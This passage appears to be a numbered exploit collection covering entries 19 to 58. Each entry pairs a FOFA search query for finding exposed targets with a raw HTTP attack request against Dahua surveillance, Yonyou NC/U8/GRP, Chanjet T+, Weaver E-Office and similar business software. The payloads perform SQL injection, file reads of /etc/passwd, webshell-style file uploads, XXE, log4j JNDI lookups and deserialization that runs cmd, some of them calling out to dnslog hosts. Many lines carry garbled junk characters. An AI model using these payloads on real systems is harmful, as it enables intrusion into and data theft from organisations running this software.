9 S0 `$ Z1 I" x2 x) ~3 ?0 E9 a9 v8 U' m7 x
0 R/ l5 A( @' j1 A. q
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入) @1 e: M3 r& z$ i
FOFA:app="dahua-DSS"
& s& c- k8 i7 d+ \GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
" p! d4 n$ L( K* B- S. |8 yHost:
9 F W( Q3 ]$ D6 E* {; d( I h$ EUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ u; D2 T6 O0 ]7 aAccept-Encoding: gzip, deflate) T' C6 c0 F4 D3 S7 I6 g
Accept: */*
9 w9 G+ m C8 N8 {! a/ DConnection: keep-alive
5 x' E% V2 j2 J/ P( `7 I0 m+ T" g" d4 `% f/ v
& M# ], m$ p: M$ R" ~3 o
20. 大华ICC智能物联综合管理平台任意文件读取
- I2 _ e- D' U! f7 {% [+ u; I- QFOFA:body="*客户端会小于800*"
5 J/ Q/ a( @$ ?/ LGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
- k: W; ?1 q$ O3 e; KHost: x.x.x.x. Y8 U) P3 v! l1 t
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36" @" G& [- B" ^. Z+ r' Y
Connection: close
# K( K5 Q8 _2 g6 Z( ]' l' LAccept: */*4 h9 u! ~6 y9 ~0 _. n
Accept-Language: en
/ p' |* Q8 z8 B# [Accept-Encoding: gzip! o3 b: ~; u% M9 E3 {
$ Y& Q2 Y- R- `, k W/ H% C' V4 j3 v
21. 大华ICC智能物联综合管理平台random远程代码执行" o" E( r; B' b( l! Y t
FOFA:icon_hash="-1935899595"( O/ H1 e7 ?% u+ y9 {% s% `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
6 { e, e+ _& W6 { f- L% M3 iHost: x.x.x.x
7 p$ b# ? n: L m$ e6 }/ J( ?User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# n* t: P7 C1 D+ ~' @
Content-Length: 161
9 Z( u8 L% s. l4 ~- eAccept-Encoding: gzip
, |, D9 `/ u+ z- Y9 Z3 _Connection: close
0 B' w3 k" q B' j( w: K, F6 IContent-Type: application/json;charset=utf-8" W/ y) ^* q: g& t7 d" u8 a
- Q' F6 j( {2 m7 @{5 F2 n7 _- L) _5 T: |8 \
"a":{
* W; \4 }4 o9 h7 T1 U "@type":"com.alibaba.fastjson.JSONObject",: U, q: M8 E, E" M
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}# V; I& u- F3 E, E, ^6 W
}"" Z1 W# j3 U5 Z9 z5 {5 ?; G1 S
}
2 t2 @7 c8 z8 D5 U b- K: R# ~' n( A( c) U- Q+ D2 z; p5 V- Z
" p/ P) K8 I2 J& A! B
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
. L1 j$ I6 \2 b8 ^FOFA:icon_hash="-1935899595". u+ U" F" |- V3 k* A" M1 D1 _& g
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1$ }+ V$ \' R; G5 ?6 Z' J
Host: your-ip3 d3 z# J5 `5 ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.360 K0 n* F( o) T. ]2 ?, Y4 p# p
Content-Type: application/json;charset=utf-88 ^+ v2 F1 F U0 L% ^4 _- y4 w: C
: s$ T$ Z( R- x b
{
, H! \/ \, F' q& ^' t* b( t"loginName":"${jndi:ldap://dnslog}"
: W' a7 l# D& f" _4 L- d}, }4 M/ |/ o$ m8 r$ r8 L
9 |( \. ~% \) ]4 x- R |' V
+ Y! l& k5 Y: w# i- I8 q' ]5 P3 ^. ^; B8 J/ g- S
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行* O g* }# G& c
FOFA:icon_hash="-1935899595"
# |: \7 P: {3 x0 X: I3 F" l& H3 W$ OPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
% c6 o+ R: ^0 n2 b! a* p8 r0 RHost: your-ip
" Y, v% q1 i0 qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( r& B) z0 ]2 f# F/ L" o8 k$ t* YContent-Type: application/json;charset=utf-8
# t W; j p5 y: `$ B+ s8 DAccept-Encoding: gzip; T2 p7 ~9 q2 M' j% p
Connection: close+ Z: j$ j6 x6 h
5 c6 n! i, l) v9 f' |3 \
{! y; R0 Z: r0 H' k- N- G
"a":{+ }9 v% i# u: J% i& j
"@type":"com.alibaba.fastjson.JSONObject",
8 }4 B2 s1 I e- D {"@type":"java.net.URL","val":"http://DNSLOG"}
- T. v1 W( L) K. [# r }""
0 E0 \" X- B$ \/ c6 ^+ }) s}
, _( z5 T p6 ^% [* e& I% i, ]: v. E$ l( s
; i+ c2 S# P! Y: y3 S% @+ f) {
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

The uploaded file is then reachable at:
/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
version: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

The uploaded file is then reachable at:
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
<soapenv:Header/>
<soapenv:Body>
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
</ser:getUserNameById>
</soapenv:Body>
</soapenv:Envelope>

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"

POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is then reachable at:
http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. Yunshikong Socialized Commerce ERP System validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. DPtech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. Chanjet T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request to the target; it executes a command that writes the given string into the given file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo":{
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd",
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
}
}
}
}

Step 2: request the following URL:
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. Chanjet T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: using the obtained Cookie, request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. Chanjet T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
}
}
}
}

57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
